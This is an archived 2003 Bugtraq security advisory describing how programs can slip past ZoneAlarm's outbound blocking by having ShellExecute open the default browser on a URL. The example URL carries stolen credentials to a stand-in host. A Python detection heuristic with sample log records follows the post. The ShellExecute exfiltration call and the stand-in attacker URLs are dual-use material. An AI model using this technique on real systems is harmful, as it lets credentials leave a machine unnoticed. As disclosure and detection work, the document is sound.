Bypassing ZoneAlarm (limited)

aceh_at_gyuvetch.bg
Date: 06/23/03

    Date: 23 Jun 2003 06:12:46 -0000
    To: bugtraq@securityfocus.com

    Hi everyone.
    I don't know if this is a new issue but it is a simple way to
    bypass (in some limited form) ZoneAlarm's Application level
    Internet access blocking.

    The Windows DLL shell32.dll exports a well known and documented function called
    ShellExecute. From the Win32 Programmer's Reference:

    >HINSTANCE ShellExecute(
    > HWND hwnd,              // handle to parent window
    > LPCTSTR lpOperation,    // pointer to string that specifies
    >                         // operation to perform
    > LPCTSTR lpFile,         // pointer to filename or folder name string
    > LPCTSTR lpParameters,   // pointer to string that specifies
    >                         // executable-file parameters
    > LPCTSTR lpDirectory,    // pointer to string that specifies default
    >                         // directory
    > INT nShowCmd            // whether file is shown when opened
    > );

    When the lpFile parameter is an Internet url, windows invokes Internet
    Explorer (or more accurately - the default web browser), which in 99% of
    the cases is allowed to access Internet, with that url. Example:

    ShellExecute(
      0,
      "open",
      "http://evil.net/collect.cgi?un=stolen_username&pw=stolen_password",
      0,
      0,
      SW_HIDE //This doesn't work.
              //I think it is supposed to hide the window but ...
      );

    The collect.cgi (after storing stolen_username/stolen_password) could
    redirect the user for example to
    windowsupdate.microsoft.com,
    so that many users will not even suspect anything.

    The info leaked is limited by the maximum allowed url length, but that
    could be more than enough for a malicious application to send some
    username/password/cookie/cc_number info to malicious server.

    This was tested on ZoneAlarm 3.1.395 (freeware) but I guess that all
    versions can be tricked if the user has granted access to his default
    web browser by default (very likely).

    VENDOR STATUS:
    I think that this is a flaw in the core design of ZoneAlarm
    (and/or Windows) and don't see a way it can be fixed.

    WORKAROUND:
    Do not allow ANY application to access Internet by default and
    review each request separately.

    Any comments are welcome.
    aceh
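As an added example, not part of aceh's post or of ZoneAlarm: a host-side detection heuristic for the pattern the post describes. The ShellExecute call above results in the default browser being started as a child of the calling program with the full URL (query string included) on its command line, so the example scores process-creation records on exactly those two signals. The records are constructed for this example; their field names only imitate Sysmon Event ID 1 (Image, ParentImage, CommandLine) and the paths and values are made up.

```python
import re
from urllib.parse import urlsplit

# Constructed, Sysmon-like process-creation records (assumed format, made-up values).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"iexplore.exe" http://windowsupdate.microsoft.com/'},
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\screensaver.exe",
     "CommandLine": '"iexplore.exe" http://evil.example/collect.cgi?un=alice&pw=hunter2'},
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\screensaver.exe",
     "CommandLine": '"iexplore.exe" http://docs.example/readme.html'},
]

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Parents that routinely open the browser on the user's behalf (assumed allow-list).
TRUSTED_LAUNCHERS = {"explorer.exe", "userinit.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return (score, reasons) for one record; 0 means nothing notable."""
    if basename(event["Image"]) not in BROWSERS:
        return 0, []
    reasons = []
    parent = basename(event["ParentImage"])
    if parent not in TRUSTED_LAUNCHERS:
        reasons.append(f"browser launched by non-shell parent {parent}")
    m = URL_RE.search(event["CommandLine"])
    if m and urlsplit(m.group(0)).query:
        # Data handed to the browser travels in the query string, so its size
        # is a rough measure of how much could have left the host this way.
        reasons.append(f"URL carries a {len(urlsplit(m.group(0)).query)}-byte query string")
    return len(reasons), reasons


def suspicious_events(events, threshold=2):
    """Records where both signals coincide, i.e. the ShellExecute pattern."""
    return [e for e in events if assess(e)[0] >= threshold]
```

A single signal on its own (an untrusted parent opening a plain documentation link, as in the third record) is left below the threshold to keep the noise down; tune the allow-list to the browsers and launchers actually present on the host.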

